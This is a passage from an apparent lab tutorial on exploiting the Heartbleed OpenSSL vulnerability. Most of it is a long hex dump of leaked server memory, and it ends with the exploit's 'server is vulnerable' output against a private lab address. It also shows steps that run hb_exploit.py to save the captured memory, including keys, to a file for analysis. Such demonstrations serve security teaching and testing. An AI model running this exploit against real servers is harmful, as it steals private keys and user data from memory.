37c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

37d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

37e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

37f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

38a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

38b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

38c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

38d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

38e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

38f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

Page 37: How to exploit heartbleed vulnerability demonstration

3900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

39a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

39b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

39c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

39d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

39e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

39f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3af0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

Page 38: How to exploit heartbleed vulnerability demonstration

3b60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3b70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

Page 39: How to exploit heartbleed vulnerability demonstration

3dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3f20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3f30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3f40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3f50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3f60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3f70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

3ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

Page 40: How to exploit heartbleed vulnerability demonstration

WARNING: server 192.168.61.131 returned more data than it should - server is

vulnerable!

Thus we can see the memory of the server, with running keys.

Step 8: Save the captured memory in hbdump.txt

#python hb_exploit.py 192.168.61.131 > hbdump.txt

Step 9: Open the hbdump.txt to analyze the captured memory.

#nano hbdump.txt (You can use any editor to view the file vi, pico, gedit etc)